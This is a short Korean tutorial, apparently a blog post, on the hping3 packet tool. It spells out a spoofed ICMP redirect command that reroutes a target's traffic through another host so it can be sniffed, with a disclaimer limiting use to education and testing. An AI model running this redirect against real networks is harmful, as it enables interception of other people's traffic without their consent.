Sniffing - hping3 툴 사용법

교육 / 테스트 용도로 사용하시기 바라며, 실제 서비스 운영중인 대상으로 사용은 자제 바랍니다.

Sniffing - hping3 툴 사용법

hping 은 Salvatore Sanfilippo (Antirez라고도 함) 가 만든 TCP/IP 프로토콜용 오픈 소스 패킷 생성기 및 분석 도구이다.hping의 새 버전인 hping3은 Tcl 언어를 사용하여 스크립팅할 수 있으며 프로그래머가 낮은 수준의 TCP/IP 와 관련된 스크립트를 작성할 수 있도록 TCP/IP 패킷 에 대한 문자열 기반 설명 엔진을 구현.

[출처] : 위키백과

hping3는 kail linux에 기본으로 설치되어 있으며, 다른 리눅스에서는 apt-get, yum과 같은 패키지 설치 명령어로 설치 가능하다.

hping다운로드 : http://www.hping.org/download.php

hping 활용 Sniffing 방법

ICMP Redirect Sniffing

• ICMP Type 5(Redirect)를 이용해 타깃의 라우팅 테이블에 특정 라우팅 정보를 수정 또는 추가

hping3의 icmp redirect 옵션

$ hping3 -1 --icmptype 5 --icmpcode 1 -a [기존 GW] --icmp-ipdst [Target 목적지] --icmp-gw [목적지의 GW] --icmp-ipsrc [Target] [Target]

e.g. hping3 -1 --icmptype 5 --icmpcode 1 -a 192.168.0.1 --icmp-ipdst 8.8.8.8 --icmp-gw 192.168.0.200 --icmp-ipsrc 192.168.0.100 192.168.0.100

# 192.168.0.100에서 8.8.8.8(dns)로 통신하는 경로를 192.168.0.200으로 갱신하여
192.168.0.100 이 8.8.8.8(dns)로 통신할 때 192.168.0.200로 패킷이 들어오며 sniffing 할 수 있음.